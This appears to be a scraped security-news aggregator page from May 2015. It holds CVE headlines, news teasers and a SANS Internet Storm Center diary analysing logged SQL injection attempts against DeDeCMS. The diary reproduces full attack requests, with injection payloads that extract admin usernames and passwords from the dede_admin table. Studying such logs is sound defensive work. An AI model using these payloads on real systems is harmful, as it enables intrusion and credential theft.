Oracle Java SE CVE-2015-0459 Remote Security Vulnerability
FUSE CVE-2015-3202 Local Privilege Escalation Vulnerability

Posted by InfoSec News on May 22


By Violet Blue
Zero Day
May 21, 2015

Headlines and infosec pros alike have been going mental over security
researcher Chris Roberts' alleged mid-flight hacking of a commercial
airplane, and his subsequent detainment by the FBI in April.

Things got hysterical last weekend when a month-old FBI search warrant
application surfaced in headlines...

Posted by InfoSec News on May 22

Forwarded from: bluknight <bluknight () skytalks info>

== https://skytalks.info ==

Skytalks is a 'sub-conference' that gives a unique platform for
researchers to share their research, for angry hackers to rant about
the issues of their industry, and for curious souls to probe
interesting issues, all without the watchful eye of the rest of the
world. With a strict, well-enforced "no recording" policy, research
that is...

Typically we try to device attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistance) to more advanced state sponsored attackers (lots of resources, decent skills and ability to conduct long lasting persistent attacks).

So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS">The attack:

GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1 301 178 - Python-urllib/2.7

DeDeCMSis a Drupal like content management system popular in China [1]. Exploits like the one above have been used at least since 2013 [2]. The site that was attacked above does not use DeDeCMS, so the attacker did not do any recognizance.

The attacker also doesnt bother modifying the user agent and keep the Python-urllib/2.7 user agent indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.

The SQL statement that is being attempted:

SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/**/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1

A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.

Sort of interesting: These were not the only attacks from these two IP addresses, and they did start out with some recognizance:

GET / HTTP/1.1 301 178 - +http://www.google.com/bot.html)

Here they spoof the Google user agent. The even first try out the plus/search.php URL:

GET //plus/search.php?keyword=astypeArr[111%3D@`\x5C`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C`+]=a HTTP/1.1 404 9093 - +http://www.google.com/bot.html)

But even though it returns a 404, they still proceed with the attack.

Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Multiple OleumTech Products CVE-2014-2361 Local Security Bypass Vulnerability
Multiple OleumTech Products CVE-2014-2362 Predictable Random Number Generator Weakness

Posted by InfoSec News on May 22


By Dan Goodin
Ars Technica
May 21, 2015

An estimated 500 million Android phones don't completely wipe data when
their factory reset option is run, a weakness that may allow the recovery
of login credentials, text messages, e-mails, and contacts, computer
scientists said Thursday.

In the first comprehensive study of the...
MIT Kerberos 5 CVE-2014-5355 Multiple Denial of Service Vulnerabilities
[CORE-2015-0010] - Sendio ESP Information Disclosure Vulnerability
[SECURITY] [DSA 3270-1] postgresql-9.4 security update


Infosec practitioners face host of challenges
Boshoff says infosec improvements are being hindered by a lack of buy-in and support from business. "It is very difficult for security practitioners to successfully implement security protocols within an organisation when they have resistance from the ...


E-mail addresses, sexual orientations, and other sensitive details from almost four million AdultFriendFinder.com subscribers have been leaked onto the Internet following a hack that rooted the casual dating service, security researchers said.

The cache includes more than 3.8 million unique e-mail addresses of current and former subscribers, Australian security researcher Troy Hunt reported early Friday morning. The data, which is in the form of 15 Microsoft Excel spreadsheets, was first seeded to anonymous sites hosted on the Tor privacy network. It has since spread to sites on the open Internet. Links to sites hosting the data are easily found on Twitter and other social networking sites, (Ars isn't publishing the locations).

The compromise was first reported by British broadcaster Channel 4. In addition to including e-mail addresses and the sexual orientations of users, the data also provided other sensitive information, such as ages, zip codes, and whether the subscriber was seeking an extramarital affair. The trove included information for deleted accounts as well as those still current.

Read 3 remaining paragraphs | Comments

SSL/TLS RC4 CVE-2015-2808 Information Disclosure Weakness
Oracle MySQL Server CVE-2015-0405 Remote Security Vulnerability
Oracle MySQL Server CVE-2015-2571 Remote Security Vulnerability
Internet Storm Center Infocon Status